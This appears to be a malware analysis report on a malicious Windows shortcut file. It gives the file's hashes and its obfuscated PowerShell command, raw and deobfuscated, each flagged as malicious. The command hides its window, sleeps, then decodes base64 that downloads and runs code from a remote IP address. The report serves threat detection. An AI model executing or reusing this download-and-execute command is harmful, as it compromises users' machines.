|
Hash | Hash Value |
|---|---|
| MD5 | e00cfc5dd0a4ed9186ed52200da4eeef
|
| Sha1 | 08fea2b857bf43655e9f719a3b7213fe78641d1a
|
| Sha256 | 860704e66a998d3d77061e79b39ce90339d8e6ff4637559542fea06f519f82a5
|
| Sha384 | 5931d7086b88d0a7bf1041ecd705920553a214e63e5a202a2ddaae8b9a931b544c89837e87f64fc9d415890d3ad7083a
|
| Sha512 | 72c71cf561137c72bc2186aae0414ea478ff283783d73f427423e279f4a1142704bff11295d133804b7056b0581074f0c3ad1d7cda69be5c952cd8d41e56486a
|
| SSDeep | 24:8w4/BHYVKVWf+/CWCNUoxOhpCxKwRIZJ99cc+VrabxJlpl9l:8B5aRNBmse9cBRadrL9
|
| TLSH | 6C3167042BF60308F7F38B75A4FAB624D97BFC56EE519F8D008542481431524F8A6F2B
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -Sta -w h -Command Start-Sleep -S 30; $fwY = 'aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg='; iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fwY))) |
| Deobfuscated PowerShell | -sta -w "h" -Command "Start-Sleep" -S 30 $fwY = "aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg=" Invoke-Expression ([Encoding]::"ASCII"."GetString"([Convert]::"FromBase64String"($fwY))) |
| Deobfuscated PowerShell | -sta -w "h" -Command "Start-Sleep" -S 30 $fwY = "aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg=" Invoke-Expression ([Encoding]::"ASCII"."GetString"([Convert]::"FromBase64String"($fwY))) |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -Sta -w h -Command Start-Sleep -S 30; $fwY = 'aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg='; iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fwY))) Malicious |
e00cfc5dd0a4ed9186ed52200da4eeef |
| Deobfuscated PowerShell | -sta -w "h" -Command "Start-Sleep" -S 30 $fwY = "aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg=" Invoke-Expression ([Encoding]::"ASCII"."GetString"([Convert]::"FromBase64String"($fwY))) Malicious |
e00cfc5dd0a4ed9186ed52200da4eeef > LNK CommandLine |
| Deobfuscated PowerShell | -sta -w "h" -Command "Start-Sleep" -S 30 $fwY = "aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg=" Invoke-Expression ([Encoding]::"ASCII"."GetString"([Convert]::"FromBase64String"($fwY))) Malicious |
e00cfc5dd0a4ed9186ed52200da4eeef > LNK CommandLine > [Deobfuscated PS] |